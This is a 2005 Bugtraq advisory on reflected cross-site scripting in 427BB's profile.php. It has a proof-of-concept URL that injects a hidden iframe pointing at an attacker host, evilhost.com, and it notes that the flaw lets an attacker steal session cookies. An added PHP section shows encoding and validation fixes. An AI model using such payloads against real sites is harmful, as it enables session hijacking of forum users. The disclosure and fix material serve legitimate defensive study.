Bugtraq: 427BB profile.php XSS vulnerability.

From: Raven <raven_at_tgs-security.com>
Date: 1 Mar 2005 00:37:06 -0000
 ==================================================
  HRG - Hackerlounge Research Group
  Release: HRG007
  Monday 03/01/05
  427BB

  The author can't be held responsible for any damage
  done by a reader. You have your own responsibility.
  Please use this document like it's meant to.
 ==================================================
  
 Vulnerable: 427BB (Any Version)
  
  
 ---
  
 General Information:
  
 427BB is a simple board, and I have no idea why I'm
releasing this because it's very unpopular, but I said
"what the hell". It's based on PHP and MySQL.
  
 ---
  
 Description:
  
 In profile.php, the value of the "user" parameter is
reflected into the page without filtering or
encoding: the characters < > and " pass through
unchanged. A remote attacker can therefore inject
arbitrary HTML and script into the profile page
(reflected cross-site scripting). Because the
injected script runs in the victim's browser within
the forum's origin, this makes it easy to steal a
user's session cookie, among other things.
  
 ---
  
 PoC Code
 Append the following query string to the profile
page URL and load it; the injected markup is rendered
and executed by the browser:
  
 profile.php?user=%3Ciframe%20src=http://www.evilhost.com%20height=1%20width=1%3E%3C/iframe%3E
  
 The hidden 1x1 iframe is only a demonstration: any
script of the attacker's choosing can be executed in
the victim's browser, which can lead to major damage
to the forum being attacked (for example, hijacked
sessions as described above).
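 As an added illustration (not code from 427BB or from
the advisory's author), the PHP below shows the
pattern the advisory describes beside two fixes:
encoding the value on output with htmlspecialchars(),
and, since "user" is a lookup key rather than free
text, validating it against an allowlist before it is
used at all. The function names, the one-line
template and the username pattern are assumptions
made for this example; the payload is the advisory's
own, URL-decoded as the web server hands it to PHP.

```php
<?php
// Added example, not 427BB's code. Shows why an unencoded "user" parameter
// is reflected XSS and two independent ways to close it. The function names,
// the template string and the username regex are assumptions for this demo.

// Vulnerable pattern: the request parameter is concatenated straight into
// HTML, so < > " reach the browser and are parsed as markup.
function render_profile_vulnerable(string $user): string
{
    return "<h1>Profile of " . $user . "</h1>";
}

// Fix 1, output encoding: & < > " ' become entities before they reach the
// page. ENT_QUOTES matters when the value is also echoed inside an attribute
// such as value="...", where a bare " would close the attribute.
function render_profile_encoded(string $user): string
{
    $safe = htmlspecialchars($user, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
    return "<h1>Profile of " . $safe . "</h1>";
}

// Fix 2, input validation: "user" selects a row, so reject anything that
// cannot be a username. The pattern is an assumed policy; match it to the
// board's real username rules. /D keeps $ from accepting a trailing newline.
function validated_username(?string $user): ?string
{
    if ($user === null || !preg_match('/^[A-Za-z0-9_.-]{1,32}$/D', $user)) {
        return null; // caller answers 400 or "no such user"
    }
    return $user;
}

// Check for a rendered page: does it carry the payload as live markup
// ("vulnerable"), as entities ("encoded"), or not at all ("absent")?
function classify_reflection(string $html, string $payload): string
{
    if (strpos($html, $payload) !== false) {
        return 'vulnerable';
    }
    $encoded = htmlspecialchars($payload, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
    if (strpos($html, $encoded) !== false) {
        return 'encoded';
    }
    return 'absent';
}

// The advisory's payload, URL-decoded the way $_GET['user'] would contain it.
$payload = urldecode(
    '%3Ciframe%20src=http://www.evilhost.com%20height=1%20width=1%3E%3C/iframe%3E'
);

foreach ([
    'vulnerable' => render_profile_vulnerable($payload),
    'encoded'    => render_profile_encoded($payload),
] as $label => $html) {
    printf("%-10s -> %s\n%s\n\n", $label, classify_reflection($html, $payload), $html);
}

// With validation the payload never reaches the template in the first place.
var_dump(validated_username($payload));
var_dump(validated_username('raven_01'));
```

 Run it with php on the command line. The same
classify_reflection() check can be pointed at the
body of a real response to the PoC URL to confirm
whether a deployment still reflects the parameter
raw, entity-encoded, or not at all. Output encoding
is the fix that must be present regardless; the
allowlist is defence in depth that also blocks the
parameter from being abused elsewhere in the script.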
  
 ---
  
 Fix and Vendor status:
  
Vendor has been notified; expect an official patch soon.
  
 ---
  
Greetz:
 
All the people at hackerlounge.com, JWT,
TGS-Security.com and JWT-Security.net.
Specifically:
 
Th3_R_at_v3n (me), Dlab, Riddick, Enjoi, Blademaster,
Modzilla, Pingu, Jake Johnson, Afterburn, airo,
cardiaC, chis, ComputerGeek, deep_phreeze, dudley,
evasion, eXtacy, Mattewan, Afterburn,
Thanatos_Starfire, Roz, Sirross, UmInAsHoE, Infinite,
Slarty, NoUse, Snake (I hate you), Surreal (I hate
you), -=Vanguard=-, The_IRS, puNKiey, driedice,
Carnuss, oKiDaN, Mr.Mind, dementis, net-RIDER,
voteforpedro, Cryptic_Override, kodaxx,
~CreEpy~NoDquE~, Brainscan, the_exode,
phillysteak12345, DerrtyJake, =>HeX<=, m0rk, and
anyone else I forgot.
 
 
---
 
Credit:
 
HRG - Hackerlounge Research Group
http://www.Hackerlounge.com
 
Partial credit is also given to
lancastertechnologies.org, founded by JWT.
 
 
Received on Mar 01 2005